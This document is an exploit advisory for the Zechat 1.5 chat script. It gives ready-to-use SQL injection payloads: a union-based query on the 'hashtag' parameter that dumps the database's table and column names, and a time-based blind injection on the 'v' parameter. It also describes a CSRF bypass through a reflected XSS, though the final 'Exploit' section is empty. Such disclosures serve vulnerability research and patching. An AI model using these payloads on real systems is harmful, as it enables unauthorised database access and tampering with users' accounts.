# Exploit Title: Zechat 1.5 - 'hashtag' / 'v' SQL Injection / Cross site request forgery # Date: 2018-05-22 # Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com # Vendor Homepage: https://bylancer.com # Version: 1.5 # Tested on: Kali linux ==================================================== # POC 1 : SQLi : Parameter : hashtag type : Union based http://test.com/chat/hashtag?hashtag=[SQL] # test : http://test.com/chat/hashtag?hashtag=-1%27%20UNION%20SELECT%20NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20from%20information_schema.columns%20where%20table_schema=schema()%23 # Payload : -1' UNION SELECT NULL,unhex(hex(group_concat(table_name,0x3C62723E,column_name))),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from information_schema.columns where table_schema=schema()%23 ==================================================== Parameter : v type : time-based blind test.com/chat/me?action=edit&v=[SQL] # test : test.com/chat/me?action=edit&v=231 AND sleep(10)%23 # Payload : AND sleep(10)%23 ==================================================== # POC 2 : CSRF : # CSRF vulnerability allows attacker to change user's information. In this script we have anti-csrf which we can't change user's information without token. So we use 'hashtag' parameter to set our encoded payload and bypass csrf protection : chat/hashtag?hashtag=[We have Reflected XSS here] # Exploit :
=====================================================